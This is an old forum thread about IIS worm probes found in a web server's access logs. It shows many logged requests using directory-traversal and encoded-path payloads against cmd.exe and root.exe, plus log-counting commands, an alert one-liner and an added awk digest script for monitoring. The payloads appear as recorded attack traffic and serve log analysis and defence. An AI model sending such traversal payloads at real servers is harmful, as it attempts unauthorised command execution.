Strange IIS log (www)


Post by Gilbert » 04 Dec 2001 23:27

Hi Zorglub,

Don't worry:

213.48.151.10 - - [02/Dec/2001:20:04:56 +0100] "GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
e88236.upc-e.chello.nl - - [03/Dec/2001:03:54:34 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
e88236.upc-e.chello.nl - - [03/Dec/2001:03:54:38 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
e88236.upc-e.chello.nl - - [03/Dec/2001:03:54:42 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
e88236.upc-e.chello.nl - - [03/Dec/2001:03:54:45 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
e88236.upc-e.chello.nl - - [03/Dec/2001:03:54:48 +0100] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
e88236.upc-e.chello.nl - - [03/Dec/2001:03:54:51 +0100] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
e88236.upc-e.chello.nl - - [03/Dec/2001:03:54:53 +0100] "GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
e88236.upc-e.chello.nl - - [03/Dec/2001:03:54:56 +0100] "GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
e88236.upc-e.chello.nl - - [03/Dec/2001:03:55:02 +0100] "GET /scripts/..À/../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
e88236.upc-e.chello.nl - - [03/Dec/2001:03:55:00 +0100] "GET /scripts/..Á../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
e88236.upc-e.chello.nl - - [03/Dec/2001:03:55:04 +0100] "GET /scripts/..À¯../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
e88236.upc-e.chello.nl - - [03/Dec/2001:03:55:07 +0100] "GET /scripts/..Áœ../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
e88236.upc-e.chello.nl - - [03/Dec/2001:03:55:10 +0100] "GET /scripts/..S5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
e88236.upc-e.chello.nl - - [03/Dec/2001:03:55:17 +0100] "GET /scripts/..S5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
e88236.upc-e.chello.nl - - [03/Dec/2001:03:55:17 +0100] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
e88236.upc-e.chello.nl - - [03/Dec/2001:03:55:20 +0100] "GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
host213-123-194-177.in-addr.btopenworld.com - - [03/Dec/2001:09:44:35 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
host213-123-194-177.in-addr.btopenworld.com - - [03/Dec/2001:09:44:51 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
host213-123-194-177.in-addr.btopenworld.com - - [03/Dec/2001:09:44:51 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
host213-123-194-177.in-addr.btopenworld.com - - [03/Dec/2001:09:44:51 +0100] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
host213-123-194-177.in-addr.btopenworld.com - - [03/Dec/2001:09:44:51 +0100] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
host213-123-194-177.in-addr.btopenworld.com - - [03/Dec/2001:09:44:51 +0100] "GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
host213-123-194-177.in-addr.btopenworld.com - - [03/Dec/2001:09:44:52 +0100] "GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
host213-123-194-177.in-addr.btopenworld.com - - [03/Dec/2001:09:44:52 +0100] "GET /scripts/..Á../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
host213-123-194-177.in-addr.btopenworld.com - - [03/Dec/2001:09:44:52 +0100] "GET /scripts/..À¯../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
host213-123-194-177.in-addr.btopenworld.com - - [03/Dec/2001:09:44:52 +0100] "GET /scripts/..À/../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
host213-123-194-177.in-addr.btopenworld.com - - [03/Dec/2001:09:44:52 +0100] "GET /scripts/..Áœ../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
host213-123-194-177.in-addr.btopenworld.com - - [03/Dec/2001:09:44:52 +0100] "GET /scripts/..S5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
host213-123-194-177.in-addr.btopenworld.com - - [03/Dec/2001:09:44:53 +0100] "GET /scripts/..S5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
host213-123-194-177.in-addr.btopenworld.com - - [03/Dec/2001:09:44:53 +0100] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
host213-123-194-177.in-addr.btopenworld.com - - [03/Dec/2001:09:44:53 +0100] "GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
c-a71471d5.017-7-65736c10.cust.bredbandsbolaget.se - - [03/Dec/2001:21:05:26 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
c-a71471d5.017-7-65736c10.cust.bredbandsbolaget.se - - [03/Dec/2001:21:05:27 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
c-a71471d5.017-7-65736c10.cust.bredbandsbolaget.se - - [03/Dec/2001:21:05:27 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
c-a71471d5.017-7-65736c10.cust.bredbandsbolaget.se - - [03/Dec/2001:21:05:27 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
c-a71471d5.017-7-65736c10.cust.bredbandsbolaget.se - - [03/Dec/2001:21:05:27 +0100] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
c-a71471d5.017-7-65736c10.cust.bredbandsbolaget.se - - [03/Dec/2001:21:05:27 +0100] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
c-a71471d5.017-7-65736c10.cust.bredbandsbolaget.se - - [03/Dec/2001:21:05:28 +0100] "GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
c-a71471d5.017-7-65736c10.cust.bredbandsbolaget.se - - [03/Dec/2001:21:05:28 +0100] "GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
c-a71471d5.017-7-65736c10.cust.bredbandsbolaget.se - - [03/Dec/2001:21:05:28 +0100] "GET /scripts/..Á../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
c-a71471d5.017-7-65736c10.cust.bredbandsbolaget.se - - [03/Dec/2001:21:05:28 +0100] "GET /scripts/..À/../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
c-a71471d5.017-7-65736c10.cust.bredbandsbolaget.se - - [03/Dec/2001:21:05:28 +0100] "GET /scripts/..À¯../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
c-a71471d5.017-7-65736c10.cust.bredbandsbolaget.se - - [03/Dec/2001:21:05:29 +0100] "GET /scripts/..Áœ../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
c-a71471d5.017-7-65736c10.cust.bredbandsbolaget.se - - [03/Dec/2001:21:05:29 +0100] "GET /scripts/..S5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
c-a71471d5.017-7-65736c10.cust.bredbandsbolaget.se - - [03/Dec/2001:21:05:29 +0100] "GET /scripts/..S5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
c-a71471d5.017-7-65736c10.cust.bredbandsbolaget.se - - [03/Dec/2001:21:05:29 +0100] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
c-a71471d5.017-7-65736c10.cust.bredbandsbolaget.se - - [03/Dec/2001:21:05:29 +0100] "GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
si4001.inktomi.com - - [04/Dec/2001:03:21:09 +0100] "GET /robots.txt HTTP/1.0" 200 147 130 "-" "Mozilla/3.0 (Slurp/si; [email protected]; http://www.inktomi.com/slurp.html)"
si4001.inktomi.com - - [04/Dec/2001:03:21:16 +0100] "GET / HTTP/1.0" 200 1151 60 "-" "Mozilla/3.0 (Slurp/si; [email protected]; http://www.inktomi.com/slurp.html)"
213-84-99-229.adsl.xs4all.nl - - [04/Dec/2001:05:49:21 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213-84-99-229.adsl.xs4all.nl - - [04/Dec/2001:05:49:33 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213-84-99-229.adsl.xs4all.nl - - [04/Dec/2001:05:49:36 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213-84-99-229.adsl.xs4all.nl - - [04/Dec/2001:05:49:40 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213-84-99-229.adsl.xs4all.nl - - [04/Dec/2001:05:49:43 +0100] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213-84-99-229.adsl.xs4all.nl - - [04/Dec/2001:05:49:46 +0100] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213-84-99-229.adsl.xs4all.nl - - [04/Dec/2001:05:49:49 +0100] "GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213-84-99-229.adsl.xs4all.nl - - [04/Dec/2001:05:49:52 +0100] "GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213-84-99-229.adsl.xs4all.nl - - [04/Dec/2001:05:49:55 +0100] "GET /scripts/..Á../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213-84-99-229.adsl.xs4all.nl - - [04/Dec/2001:05:49:58 +0100] "GET /scripts/..À/../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213-84-99-229.adsl.xs4all.nl - - [04/Dec/2001:05:50:07 +0100] "GET /scripts/..À¯../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213.213.77.194 - - [04/Dec/2001:06:04:56 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213.213.77.194 - - [04/Dec/2001:06:05:02 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213.213.77.194 - - [04/Dec/2001:06:05:07 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213.213.77.194 - - [04/Dec/2001:06:05:12 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213.213.77.194 - - [04/Dec/2001:06:05:17 +0100] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213.213.77.194 - - [04/Dec/2001:06:05:22 +0100] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213.213.77.194 - - [04/Dec/2001:06:05:27 +0100] "GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213.213.77.194 - - [04/Dec/2001:06:05:32 +0100] "GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213.213.77.194 - - [04/Dec/2001:06:05:37 +0100] "GET /scripts/..Á../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213.213.77.194 - - [04/Dec/2001:06:05:42 +0100] "GET /scripts/..À/../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213.213.77.194 - - [04/Dec/2001:06:05:47 +0100] "GET /scripts/..À¯../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213.213.77.194 - - [04/Dec/2001:06:05:52 +0100] "GET /scripts/..Áœ../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213.213.77.194 - - [04/Dec/2001:06:05:57 +0100] "GET /scripts/..S5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213.213.77.194 - - [04/Dec/2001:06:06:02 +0100] "GET /scripts/..S5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213.213.77.194 - - [04/Dec/2001:06:06:07 +0100] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213.213.77.194 - - [04/Dec/2001:06:06:12 +0100] "GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
si4000.inktomi.com - - [04/Dec/2001:09:41:17 +0100] "GET /robots.txt HTTP/1.0" 200 147 10 "-" "Mozilla/3.0 (Slurp/si; [email protected]; http://www.inktomi.com/slurp.html)"
si4000.inktomi.com - - [04/Dec/2001:09:41:17 +0100] "GET /robots.txt HTTP/1.0" 200 147 10 "-" "Mozilla/3.0 (Slurp/si; [email protected]; http://www.inktomi.com/slurp.html)"
si4000.inktomi.com - - [04/Dec/2001:09:41:18 +0100] "GET / HTTP/1.0" 200 1151 40 "-" "Mozilla/3.0 (Slurp/si; [email protected]; http://www.inktomi.com/slurp.html)"
si4000.inktomi.com - - [04/Dec/2001:09:41:18 +0100] "GET / HTTP/1.0" 200 1151 0 "-" "Mozilla/3.0 (Slurp/si; [email protected]; http://www.inktomi.com/slurp.html)"
213.208.1.25 - - [04/Dec/2001:10:47:59 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213.208.1.25 - - [04/Dec/2001:10:48:04 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213.208.1.25 - - [04/Dec/2001:10:48:09 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213.208.1.25 - - [04/Dec/2001:10:48:14 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213.208.1.25 - - [04/Dec/2001:10:48:18 +0100] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213.208.1.25 - - [04/Dec/2001:10:48:23 +0100] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213.208.1.25 - - [04/Dec/2001:10:48:28 +0100] "GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213.208.1.25 - - [04/Dec/2001:10:48:33 +0100] "GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213.208.1.25 - - [04/Dec/2001:10:48:37 +0100] "GET /scripts/..Á../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213.208.1.25 - - [04/Dec/2001:10:48:42 +0100] "GET /scripts/..À/../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213.208.1.25 - - [04/Dec/2001:10:48:47 +0100] "GET /scripts/..À¯../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213.208.1.25 - - [04/Dec/2001:10:48:52 +0100] "GET /scripts/..Áœ../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213.208.1.25 - - [04/Dec/2001:10:48:56 +0100] "GET /scripts/..S5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213.208.1.25 - - [04/Dec/2001:10:49:01 +0100] "GET /scripts/..S5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213.208.1.25 - - [04/Dec/2001:10:49:06 +0100] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213.208.1.25 - - [04/Dec/2001:10:49:11 +0100] "GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213.154.134.186 - - [04/Dec/2001:11:22:08 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213.154.134.186 - - [04/Dec/2001:11:22:13 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213.154.134.186 - - [04/Dec/2001:11:22:18 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213.154.134.186 - - [04/Dec/2001:11:22:23 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213.154.134.186 - - [04/Dec/2001:11:22:27 +0100] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213.154.134.186 - - [04/Dec/2001:11:22:33 +0100] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213.154.134.186 - - [04/Dec/2001:11:22:37 +0100] "GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213.154.134.186 - - [04/Dec/2001:11:22:42 +0100] "GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213.154.134.186 - - [04/Dec/2001:11:22:47 +0100] "GET /scripts/..Á../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213.154.134.186 - - [04/Dec/2001:11:22:52 +0100] "GET /scripts/..À/../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213.154.134.186 - - [04/Dec/2001:11:22:57 +0100] "GET /scripts/..À¯../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213.154.134.186 - - [04/Dec/2001:11:23:02 +0100] "GET /scripts/..Áœ../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213.154.134.186 - - [04/Dec/2001:11:23:07 +0100] "GET /scripts/..S5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213.154.134.186 - - [04/Dec/2001:11:23:12 +0100] "GET /scripts/..S5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213.154.134.186 - - [04/Dec/2001:11:23:17 +0100] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
213.154.134.186 - - [04/Dec/2001:11:23:22 +0100] "GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
si3002.inktomi.com - - [04/Dec/2001:11:50:24 +0100] "GET /robots.txt HTTP/1.0" 200 147 0 "-" "Mozilla/3.0 (Slurp/si; [email protected]; http://www.inktomi.com/slurp.html)"
si3002.inktomi.com - - [04/Dec/2001:11:51:51 +0100] "GET /robots.txt HTTP/1.0" 200 147 0 "-" "Mozilla/3.0 (Slurp/si; [email protected]; http://www.inktomi.com/slurp.html)"
si3003.inktomi.com - - [04/Dec/2001:13:03:14 +0100] "GET /robots.txt HTTP/1.0" 200 147 0 "-" "Mozilla/3.0 (Slurp/si; [email protected]; http://www.inktomi.com/slurp.html)"
si3003.inktomi.com - - [04/Dec/2001:13:04:26 +0100] "GET /robots.txt HTTP/1.0" 200 147 10 "-" "Mozilla/3.0 (Slurp/si; [email protected]; http://www.inktomi.com/slurp.html)"
si3003.inktomi.com - - [04/Dec/2001:13:04:27 +0100] "GET / HTTP/1.0" 200 1151 10 "-" "Mozilla/3.0 (Slurp/si; [email protected]; http://www.inktomi.com/slurp.html)"
si3003.inktomi.com - - [04/Dec/2001:13:04:35 +0100] "GET / HTTP/1.0" 200 1151 0 "-" "Mozilla/3.0 (Slurp/si; [email protected]; http://www.inktomi.com/slurp.html)"
cf4-e3.par.libertysurf.net - - [04/Dec/2001:16:06:26 +0100] "GET /taichi/taichi.htm HTTP/1.0" 200 6186 140 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; FREE; KITV4 Wanadoo)"
ALagny-102-1-3-18.abo.wanadoo.fr - - [04/Dec/2001:20:01:27 +0100] "GET /taichi/taichi.htm HTTP/1.1" 200 6186 0 "http://search.ke.voila.fr/S/wanadoo?gb=site&dt=*&cid=wng&kw=mouvement+tai+chi+chuan&cid=wng" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Wanadoo 5.3)"
213.29.22.53 - - [04/Dec/2001:21:24:16 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"

You see, it's no better :sad:
See you,

Gilbert

Post by Zion » 04 Dec 2001 23:45

I had written myself a script to warn me of each attack... And in the end, I was getting 20-30 mails every morning, seriously!

Post by max » 05 Dec 2001 00:28

# zgrep -c "cmd.exe" /var/log/apache/access.log*
access.log:115
access.log.0:255
access.log.1.gz:991
access.log.2.gz:829
access.log.3.gz:2304
access.log.4.gz:1467
access.log.5.gz:1683
access.log.6.gz:1353
access.log.7.gz:986
access.log.8.gz:1066
access.log.9.gz:922
access.log.10.gz:4585

access.log.10 is August-September, when the majority of IIS servers were not patched.

A few more months, and it will be nothing more than a bad memory :smile: (and there will be some new, even nastier thing :sad: )

[ This message was edited by: max on 2001-12-04 23:29 ]

Post by Flynux » 05 Dec 2001 06:10

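# Follow the access log and mail every new line that matches "skynet.*cmd"
tail -f /var/lib/apache/logs/access_log | while IFS= read -r f; do if printf '%s\n' "$f" | grep -q "skynet.*cmd"; then printf '%s\n' "$f" | mail -s "log apache no comment" [email protected]; fi; done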

Post by Guest » 05 Dec 2001 12:26

And then it's skynet that will write to your ISP's abuse@ for having abused their [email protected] =)
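
The per-line mail loop and the 20-30 mails each morning mentioned in the thread point towards one digest per log rather than one mail per hit. The following is an added example, not code from any poster: it summarises the cmd.exe/root.exe probes per source host and counts how many did not return 404. The names `probe_digest` and `sample_log` are hypothetical, the sample lines are constructed with documentation addresses, and the field positions (path in field 7, status in field 9) assume the log format shown in the thread.

```shell
#!/bin/sh
# Added example: one digest of cmd.exe/root.exe probes per source host,
# instead of one mail per log line. Reads access-log lines on stdin.

# probe_digest prints one line per probing host, busiest host first:
#   <probes> <probes_not_404> <host> <first_seen> <last_seen>
# A non-zero second column means a probe got something other than
# "not found" and that request deserves a closer look.
probe_digest() {
    awk '
        # Field 7 is the request path, field 9 the HTTP status.
        tolower($7) ~ /(cmd|root)\.exe/ {
            ts = substr($4, 2)              # drop the leading "["
            if (!($1 in n)) first[$1] = ts
            n[$1]++
            last[$1] = ts
            if ($9 != 404) hit[$1]++
        }
        END {
            for (h in n) print n[h], hit[h] + 0, h, first[h], last[h]
        }
    ' | LC_ALL=C sort -k1,1nr -k3,3
}

# Constructed sample lines (documentation addresses, not from the thread).
# The last line is given a 200 status on purpose to show the flagged case.
sample_log() {
    cat <<'EOF'
192.0.2.10 - - [04/Dec/2001:06:04:56 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
192.0.2.10 - - [04/Dec/2001:06:05:02 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
192.0.2.10 - - [04/Dec/2001:06:05:07 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
203.0.113.5 - - [04/Dec/2001:09:41:17 +0100] "GET /robots.txt HTTP/1.0" 200 147 10 "-" "ExampleBot/1.0"
198.51.100.7 - - [04/Dec/2001:10:47:59 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 0 0 "-" "-"
198.51.100.7 - - [04/Dec/2001:10:48:18 +0100] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 512 0 "-" "-"
EOF
}

# Stand-alone run on the sample; from cron, feed it the real log and
# pipe the result to mail once a day.
sample_log | probe_digest
```

On a server that is not IIS every probe ends in 404, so the second column stays at 0 and the digest is only a measure of background noise.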